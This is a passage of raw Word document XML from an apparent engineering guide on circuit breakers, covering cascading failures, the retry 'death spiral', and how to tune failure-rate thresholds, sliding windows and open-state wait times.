      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Cascading Failure — The Problem Circuit Breakers Solve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E096C4F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Anatomy of a Cascade (Without Circuit Breakers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CF90E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B4635" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 0:   Database becomes slow (overloaded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46013AF7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 5s:  Service C (calls DB) threads start blocking on slow queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FFC29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 15s: Service C's thread pool exhausted. New requests queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B96FFD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 20s: Service B (calls C) starts timing out on calls to C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09EE24" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 30s: Service B's thread pool exhausted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A019B84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">Time 35s: Service A (calls B) starts timing out on calls to B  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB7F8E3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 45s: Service A's thread pool exhausted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3DF73" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 50s: API Gateway (calls A) starts timing out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31302774" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 60s: ALL user-facing requests failing. ENTIRE system is down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F665D77" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A slow database. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Total system failure. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Duration without circuit breakers:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Until the database recovers (could be minutes to hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C6D48" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Same Scenario WITH Circuit Breakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E992ED6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A68CC0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 0:    Database becomes slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117286C2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 5s:   Service C threads blocking on slow queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A86E41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 15s:  Service C's circuit breaker to DB TRIPS (50% failure rate exceeded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659AB324" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 15s:  Service C immediately returns fallback/error for DB-dependent requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD74BE8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 15s:  Service C's threads FREE UP (no longer blocking on DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30880FB3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Time 16s:  Service B's calls to C either succeed (non-DB operations) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF08C9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">           or get fast failures (DB-dependent operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17910128" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 16s:  Service B remains healthy. Its threads are fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E61201" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Time 16s:  Service A remains healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D8C3B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">Time 16s:  Users get partial degradation (some features unavailable) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B095B13" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">           but core functionality works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F79EC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Same slow database. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Only DB-dependent features are affected. Rest of system is healthy. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Duration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Until DB recovers. When it does, circuit breaker tests → closes → full functionality restored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36920417" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 The "Death Spiral" Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3C61E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A particularly nasty cascade:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC43114" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service is slightly overloaded → response time increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9BD7B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Clients timeout and retry → load doubles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF15F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service is now heavily overloaded → more timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E99A91" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>More retries → load quadruples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB6240" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service completely overwhelmed → all requests fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49550638" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Dependent services also fail (their calls to this service all timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDC6B6F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Users retry (hit refresh) → even more load at the edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C125A09" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The entire system is in a death spiral that feeds on itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17150DDF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How circuit breakers break the spiral:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1EE91" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>At step 2: When failure rate exceeds threshold, circuit opens → retries STOP → load on the overwhelmed service DROPS → service recovers → circuit closes → system returns to normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA0040" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Without the circuit breaker, the spiral is self-reinforcing and may require manual intervention (restart services, shed load manually, scale up capacity) to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33186D58" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="6831555A">
          <v:rect id="_x0000_i4248" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27977E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Circuit Breaker Configuration — Getting the Parameters Right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBA466" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.1 Failure Rate Threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130EBEEA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The percentage of failures that triggers the circuit to open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BED307" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setting it too low (e.g., 10%):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB279FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit trips on normal error rates (most systems have ~1–5% baseline errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE3BC6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Frequent unnecessary circuit opens → false positives → unnecessary degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747C724" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>System becomes flappy (opening/closing constantly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF6A00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setting it too high (e.g., 90%):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F824522" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit only trips when the downstream is almost completely dead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A31FF6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>During the period from 50% to 90% failure rate, the caller is still wasting resources on failing calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E0EE3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cascade protection is delayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DF14F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended starting points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF2B2E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>External services (unpredictable): 50% failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828687E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Internal services (well-understood): 60–70% failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D6903" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Critical path (must fail fast): 30–40% failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF27D9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The right value depends on your system's tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9F4F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If a 50% failure rate from a downstream means your service is already useless → trip at 50%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC73DB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If you can operate meaningfully with 50% of downstream calls failing (because you have retries/fallbacks per-request) → higher threshold is fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9644F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Sliding Window Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0316F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The time period (or number of requests) over which failure rate is calculated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D565A2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too small (e.g., 5 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA8F0DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Sensitive to short bursts. A 2-second network hiccup trips the circuit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D0F2B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>More false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABF05C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Faster reaction time (genuine failures are detected quickly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530F07C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too large (e.g., 5 minutes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618690A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Slow to detect failures (need sustained failures over 5 minutes to trip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026814B6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>By the time circuit opens, significant damage has already occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF4CE0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Less false positives from short transient issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10652784" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended starting points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A999FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>High-traffic services (&gt; 100 RPS): 10–30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C857119" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Low-traffic services (&lt; 10 RPS): 60 seconds (need more time to accumulate statistically significant data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650C564" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Critical latency-sensitive paths: 5–10 seconds (fast detection is paramount).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B16A29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Wait Duration in Open State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842A91E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> How long the circuit stays open before transitioning to half-open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ED86A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
